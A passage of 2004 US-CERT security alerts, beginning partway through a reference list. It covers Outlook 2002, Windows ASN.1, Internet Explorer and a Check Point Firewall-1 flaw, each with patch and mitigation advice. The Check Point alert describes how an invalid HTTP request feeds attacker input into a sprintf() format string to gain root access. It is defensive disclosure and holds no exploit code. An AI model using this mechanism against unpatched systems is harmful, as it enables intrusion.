• CAN-2004-0079 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0079>
• CAN-2004-0112 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0112>
• CAN-2004-0081 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0081>
• RFC 2712 Addition of Kerberos Cipher Suites to Transport Layer Security (TLS) - <http://www.ietf.org/rfc/rfc2712.txt>

 

These vulnerabilities were researched and reported by the OpenSSL Project and the U.K. National Infrastructure Security Co-ordination Centre (NISCC).

Feedback can be directed to the authors: Art Manion and Damon Morda.

Revision History

• March 18, 2004: Initial release
  March 19, 2004: Added CVE CAN references VU# links
   

  Last updated 

Systems Affected  

Systems running Microsoft Office XP and Outlook 2002

  Overview  

There is a vulnerability in Outlook 2002 that could allow attackers to take control of your computer.

  Description  

By taking advantage of the way Outlook interprets email links, an attacker may be able to gain control of your computer.

A technical description of these vulnerabilities is available from US-CERT in TA04-070A and from Microsoft in MS04-009.

Resolution Apply a patch

Microsoft's Office Security Update for March 2004 links to the necessary patches.

References

• US-CERT Technical Alert TA04-070A - <http://www.us-cert.gov/cas/techalerts/TA04-070A.html>
• Microsoft's Office Security Update for March 2004 - <http://www.microsoft.com/security/security_bulletins/20040309_office.asp>
• Microsoft Security Bulletin MS04-009 - <http://www.microsoft.com/technet/security/bulletin/ms04-009.mspx>

This document is available from <http://www.us-cert.gov/cas/alerts/SA04-070A.html>

Copyright 2004 Carnegie Mellon University. Terms of use

Revision History

• March 10, 2004: Initial release

  Last updated 

Systems Affected  

Systems running Microsoft Windows

  Overview  

Microsoft Windows contains multiple vulnerabilities, the most serious of which could allow attackers to take control of your computer.

  Description  

Microsoft's updated Home User Security Bulletin for February 2004 describes more vulnerabilities in the Microsoft Windows operating system. Microsoft is tracking these issues as Security Update 828028.

It is unclear at this time how many different ways your computer can be compromised using these vulnerabilities, so we recommend you apply the updates below as soon as possible. A technical description of these vulnerabilities is available from US-CERT in TA04-041A and from Microsoft in MS04-007.

Resolution Apply a patch

Microsoft has released a home user bulletin describing how to determine what patches you will need and how to get them. Follow the procedures outlined in Microsoft's updated Home User Security Bulletin for February 2004.

For additional information, and to receive updates on this alert, go to http://www.us-cert.gov/cas/alerts/SA04-041A.html

References

• US-CERT Technical Alert TA04-041A - <http://www.us-cert.gov/cas/techalerts/TA04-041A.html>
• Microsoft's Updated Home User Security Bulletin for February 2004 - <http://www.microsoft.com/security/security_bulletins/20040210_windows.asp>
• Microsoft Security Bulletin MS04-007 - <http://www.microsoft.com/technet/security/bulletin/MS04-007.asp>
• Microsoft Knowledge Base Article 828028: An ASN.1 vulnerability could allow code execution - <http://support.microsoft.com/?kbid=828028>

This document is available from <http://www.us-cert.gov/cas/alerts/SA04-041A.html>

Copyright 2004 Carnegie Mellon University. Terms of use

Revision History

• February 10, 2004: Initial release

  Last updated 

Systems Affected  

• Check Point Firewall-1 NG FCS
• Check Point Firewall-1 NG FP1
• Check Point Firewall-1 NG FP2
• Check Point Firewall-1 NG FP3, HF2
• Check Point Firewall-1 NG with Application Intelligence R54
• Check Point Firewall-1 NG with Application Intelligence R55

 

  Overview  

Several versions of Check Point Firewall-1 contain a vulnerability that allows remote attackers to execute arbitrary code with administrative privileges. This allows the attacker to take control of the firewall and the server it runs on.

 

  Description  

The Application Intelligence (AI) component of Check Point Firewall-1 is an application proxy that scans traffic for application layer attacks once it has passed through the firewall at the network level. Earlier versions of Firewall-1 include the HTTP Security Server, which provides similar functionality.

Both the AI and HTTP Security Server features contain an HTTP parsing vulnerability that is triggered by sending an invalid HTTP request through the firewall. When Firewall-1 generates an error message in response to the invalid request, a portion of the input supplied by the attacker is included in the format string for a call to sprintf().

Researchers at Internet Security Systems have determined that it is possible to exploit this format string vulnerability to execute commands on the firewall. The researchers have also determined that this vulnerability can be exploited as a heap overflow, which would allow an attacker to execute arbitrary code. In either case, the commands or code executed by the attacker would run with administrative privileges, typically "SYSTEM" or "root". For more information, please see the ISS advisory at:

http://xforce.iss.net/xforce/alerts/id/162

The CERT/CC is tracking this issue as VU#790771. This reference number corresponds to CVE candidate CAN-2004-0039.

Impact

This vulnerability allows remote attackers to execute arbitrary code on affected firewalls with administrative privileges, typically "SYSTEM" or "root".

Solution Apply the patch from Check Point

Check Point has published a "Firewall-1 HTTP Security Server Update" that modifies the error return strings used when an invalid HTTP request is detected. For more information, please see the Check Point bulletin at:

http://www.checkpoint.com/techsupport/alerts/security_server.html

Disable the affected components

Check Point has reported that their products are only affected by this vulnerability if the HTTP Security Servers feature is enabled. Therefore, affected sites may be able to limit their exposure to this vulnerability by disabling HTTP Security Servers or the Application Intelligence component, as appropriate.

This vulnerability was discovered and researched by Mark Dowd of ISS X-Force.

This document was written by Jeffrey P. Lanza.

This document is available from http://www.us-cert.gov/cas/techalerts/TA04-036A.html

Revision History

• 02/05/2004: Initial release
  02/06/2004: Updated Solution section
  02/06/2004: Updated Overview and Impact sections
   

  Last updated 

Systems Affected  

Microsoft Windows systems running

• Internet Explorer 5.01
• Internet Explorer 5.50
• Internet Explorer 6

Previous versions that are no longer supported may also be affected.

 

  Overview  

Microsoft Internet Explorer (IE) contains multiple vulnerabilities, the most serious of which could allow attackers in any location to run programs of their choice on your computer using the same privileges as you have.

Quick Links

Patch Information | Problem Description | References 

  Description  

Microsoft's Home User Security Bulletin for February 2004 describes three vulnerabilities in Internet Explorer (IE).

Note that in addition to IE, any applications that use IE to interpret HTML documents, such as email programs, may present additional ways for these vulnerabilities to be used. 

These vulnerabilities have different impacts, ranging from disguising the true location of a URL to executing computer commands or code, essentially taking over control of your computer and any data on it. The attacker could exploit this vulnerability by convincing you, the victim, to access a specially crafted HTML document such as a web page or HTML email message. Your computer can be compromised simply by viewing the attacker's HTML document with Internet Explorer. 

 

A technical description of these vulnerabilities is available from US-CERT in TA04-033A and from Microsoft in MS04-004.

Resolution Apply a patch

Microsoft has released a home user bulletin describing how to determine what patches you will need and how to get them. Follow the procedures outlined in Microsoft's Home User Security Bulletin for February 2004.

For additional information, and to receive updates on this alert, go to http://www.us-cert.gov.

References

• US-CERT Technical Alert TA04-033A - <http://www.us-cert.gov/cas/techalerts/TA04-033A.html>
• Microsoft's Home User Security Bulletin for February 2004 - <http://www.microsoft.com/security/security_bulletins/20040202_windows.asp>
• Microsoft Security Bulletin MS04-004 - <http://www.microsoft.com/technet/security/bulletin/MS04-004.asp>

This document is available from <http://www.us-cert.gov/cas/alerts/SA04-033A.html>

Copyright 2004 Carnegie Mellon University. Terms of use

Revision History

• February 02, 2004: Initial release

  Last updated